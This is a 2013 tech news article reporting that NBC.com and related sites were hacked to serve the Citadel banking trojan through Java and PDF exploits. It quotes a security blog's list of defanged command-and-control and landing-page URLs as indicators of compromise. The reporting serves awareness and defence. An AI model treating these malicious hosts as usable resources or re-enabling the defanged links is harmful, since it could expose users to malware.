UPDATED 13:57 EST / FEBRUARY 21 2013

NEWS

NBC.com and Associated Sites Hacked and Serving Citadel Malware -UPDATES: Google, Facebook Blocking NBC Links

A Twitter tip (@zrotech) has us on to the breaking news of NBC.com being hacked and serving up Citadel malware.

A quick search turned up the following information on the Hitman Pro blog –

A few hours ago Ronald Prins of Fox-IT (@cryptoron) was tweeting about NBC.COM spreading malware. We were investigating this as well and found the following interesting facts.

There were two exploits links on the NBC website. The first one was on the main default (entry) page. And the second one was located onhttp://www.nbc.com/assets/core/js/s_wrapper.js

It serves both Java (CVE-2013-0422) and PDF exploits. The exploit drops the Citadel Trojan which is used for banking fraud and cyber-espionage. The Citadel malware communicates with the following server, which is already sinkholed:

hxxp://184.82.177.125/tr2002/file.php
hxxp://184.82.177.125/tr2102/file.php

An hour later the attack pages were swapped, which means the cyber criminals still have access to NBC’s pages,  (my emphasis) linking to e.g.:

hxxp://moi-npovye-sploett.com/qqqq/1.php
hxxp://nikweinstein.com/cl/google.php
hxxp://walterjeffers.com/ctuk.html
hxxp://barbecuechickenrecipes.org/ctuk.htm

 

Banking fraud and cyber espionage are giant threats in the world of malware.  With all the news recently of Twitter, Facebook, and Apple getting hacked, it is interesting that this big of an exploit has come up in the recent wake of those stories.  There have been accusations of a Chinese military-sponsored effort behind the biggest and most sophisticated cyber-attacks against this country.  We’ll update with all details as they become available.  In the meantime, don’t visit NBC.com if you can help it.

Update – The same source reports that Facebook is blocking links to NBC.com

UPDATE 2 –
Reports are coming in that this of course affects not only NBC’s subsites, but other sites like JayLenosGarage and Late Night with Jimmy Fallon.  Google is also reportedly blacklisting all NBC sites, which I have tested but haven’t seen yet.

Last Update – There are reports that the malware is no longer active and has been removed from the sites.   We’ll have a wrap-up on everything we can find out – what happened, how you can protect yourself and more as soon as possible.

Since you’re here …

… We’d like to tell you about our mission and how you can help us fulfill it. SiliconANGLE Media Inc.’s business model is based on the intrinsic value of the content, not advertising. Unlike many online publications, we don’t have a paywall or run banner advertising, because we want to keep our journalism open, without influence or the need to chase traffic.The journalism, reporting and commentary on SiliconANGLE — along with live, unscripted video from our Silicon Valley studio and globe-trotting video teams at theCUBE — take a lot of hard work, time and money. Keeping the quality high requires the support of sponsors who are aligned with our vision of ad-free journalism content.

If you like the reporting, video interviews and other ad-free content here, please take a moment to check out a sample of the video content supported by our sponsors, tweet your support, and keep coming back to SiliconANGLE.

Cookies

We employ the use of cookies. Find out more.